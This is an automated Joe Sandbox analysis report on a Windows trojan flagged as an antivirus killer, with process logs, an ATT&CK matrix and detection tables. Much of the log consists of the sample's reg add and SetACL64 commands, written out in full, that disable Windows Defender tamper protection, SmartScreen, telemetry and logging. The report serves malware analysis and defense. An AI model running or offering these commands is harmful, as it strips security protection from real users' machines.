Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970680F6 SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,SetSecurityDescriptorDacl,SetSecurityDescriptorSacl,GetLastError,MakeSelfRelativeSD,MakeSelfRelativeSD,GetLastError,_invalid_parameter_noinfo_noreturn,4_2_00007FF6970680F6
Source: PowerRun64.exe.0.drBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69708BD40 cpuid 4_2_00007FF69708BD40
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,4_2_00007FF697086C40
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: EnumSystemLocalesW,4_2_00007FF69708791C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF697087674
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: GetLocaleInfoW,4_2_00007FF697087548
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00007FF697087498
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: GetLocaleInfoW,4_2_00007FF697087340
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: EnumSystemLocalesW,4_2_00007FF69708705C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF6970870F4
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: EnumSystemLocalesW,4_2_00007FF697086F8C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: try_get_function,GetLocaleInfoW,4_2_00007FF697087EB0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,5_2_00007FF697086C40
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: EnumSystemLocalesW,5_2_00007FF69708791C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00007FF697087674
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: GetLocaleInfoW,5_2_00007FF697087548
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_00007FF697087498
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: GetLocaleInfoW,5_2_00007FF697087340
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: EnumSystemLocalesW,5_2_00007FF69708705C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00007FF6970870F4
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: EnumSystemLocalesW,5_2_00007FF697086F8C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: try_get_function,GetLocaleInfoW,5_2_00007FF697087EB0
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69704D304 GetSystemTimeAsFileTime,GetCurrentThreadId,GetUserNameExW,GetLastError,GetUserNameExW,GetLastError,LeaveCriticalSection,LeaveCriticalSection,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF69704D304
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69706F3C0 LookupAccountNameW,GetLastError,GetLastError,LookupAccountNameW,GetLastError,IsValidSid,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,4_2_00007FF69706F3C0
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeCode function: 0_2_0040350F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350F

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Windows\SysWOW64\reg.exeRegistry value created: SpyNetReportingLocation 0Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\ExclusionsRegistry value created: DisableAutoExclusions 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngineRegistry value created: MpEnablePus 0
Source: C:\Windows\SysWOW64\reg.exeRegistry value created: TamperProtectionSource 2Jump to behavior
Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer SmartScreenEnabled OffJump to behavior
Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter PreventOverrideJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Native API
1
Scripting
1
DLL Side-Loading
6
Disable or Modify Tools
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter
1
DLL Side-Loading
1
Bypass User Account Control
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol2
Browser Session Hijacking
Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Access Token Manipulation
1
Obfuscated Files or Information
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares1
Clipboard Data
SteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook12
Process Injection
1
Timestomp
NTDS34
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets121
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Bypass User Account Control
Cached Domain Credentials1
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry
DCSync1
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Virtualization/Sandbox Evasion
Proc Filesystem1
System Owner/User Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
Process Injection
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
3Dut8dFCwD.exe45%ReversingLabsWin32.Trojan.AvKiller
3Dut8dFCwD.exe46%VirustotalBrowse
3Dut8dFCwD.exe100%AviraBAT/Disabler.ktkgs
3Dut8dFCwD.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe21%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe19%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe5%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dll0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\win_version_csharp.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\win_version_csharp.exe1%VirustotalBrowse
No Antivirus matches
SourceDetectionScannerLabelLink
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
SourceDetectionScannerLabelLink
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
https://helgeklein.com0%Avira URL Cloudsafe
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe0%Avira URL Cloudsafe
https://helgeklein.com.0%Avira URL Cloudsafe
https://helgeklein.com.0%VirustotalBrowse
https://helgeklein.com0%VirustotalBrowse
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
fp2e7a.wpc.phicdn.net
192.229.221.95
truefalseunknown
NameSourceMaliciousAntivirus DetectionReputation
http://nsis.sf.net/NSIS_ErrorError3Dut8dFCwD.exefalse
  • URL Reputation: safe
unknown
https://helgeklein.com.SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://helgeklein.comSetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exeSetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
No contacted IP infos
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1472091
Start date and time:2024-07-12 09:52:01 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 50s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:42
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:3Dut8dFCwD.exe
renamed because original name is a hash value
Original Sample Name:3f58da2e1652dddab53995166f24993f.exe
Detection:MAL
Classification:mal100.phis.evad.winEXE@145/7@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 97%
  • Number of executed functions: 64
  • Number of non-executed functions: 167
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Excluded IPs from analysis (whitelisted): 20.3.187.198
  • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
No simulations
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
fp2e7a.wpc.phicdn.nethttps://form.jotform.com/241928414558060?email=achim@hdasan.comGet hashmaliciousUnknownBrowse
  • 192.229.221.95
https://inodive.us/css/ZC5zYXV0aWVyQHNibS5tYw==Get hashmaliciousHTMLPhisherBrowse
  • 192.229.221.95
http://119-18-34-76.771222.bne.static.aussiebb.netGet hashmaliciousUnknownBrowse
  • 192.229.221.95
V-Mail_maryland.gov.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
  • 192.229.221.95
https://www.searchvity.comGet hashmaliciousUnknownBrowse
  • 192.229.221.95
https://mail.pfl.fyi/v1/messages/01909fdd-253c-74e4-a4d4-2d3080c42178/click?link_id=01909fdd-2577-78fa-9aa1-1363f665f21c&signature=ec89d906ae45cddf78ff2ac5ff90a7b4fb4098deGet hashmaliciousUnknownBrowse
  • 192.229.221.95
Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
  • 192.229.221.95
https://zzmc.tatateri.com/lPY0TK6A/#Mandrew.lapkin@innocap.comGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
  • 192.229.221.95
http://bitcoindogsclub-65w.pages.dev/Get hashmaliciousUnknownBrowse
  • 192.229.221.95
http://att-108408-101682.weeblysite.com/Get hashmaliciousUnknownBrowse
  • 192.229.221.95
No context
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exefile.exeGet hashmaliciousUnknownBrowse
    Ptmhbplhxb.exeGet hashmaliciousUnknownBrowse
      P196hUN2fw.exeGet hashmaliciousUnknownBrowse
        C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exePtmhbplhxb.exeGet hashmaliciousUnknownBrowse
          P196hUN2fw.exeGet hashmaliciousUnknownBrowse
            e4.exeGet hashmaliciousRedLineBrowse
              2dOeahdsto.exeGet hashmaliciousXmrigBrowse
                bQQHP9ciRL.exeGet hashmaliciousXmrigBrowse
                  DllHost.exeGet hashmaliciousXmrigBrowse
                    Fza7TPh6Z7.exeGet hashmaliciousUnknownBrowse
                      SAlxtNmHFR.exeGet hashmaliciousRedLine XmrigBrowse
                        BFSdrqaAvS.exeGet hashmaliciousAmadey RedLineBrowse
                          We7WnoqeXe.exeGet hashmaliciousAmadey RedLineBrowse
                            Process:C:\Users\user\Desktop\3Dut8dFCwD.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):945944
                            Entropy (8bit):6.654096172451499
                            Encrypted:false
